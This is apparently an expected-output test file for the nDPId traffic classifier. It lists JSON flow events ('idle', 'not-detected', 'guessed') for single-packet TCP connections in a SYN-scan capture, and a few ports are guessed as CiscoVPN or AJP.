-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 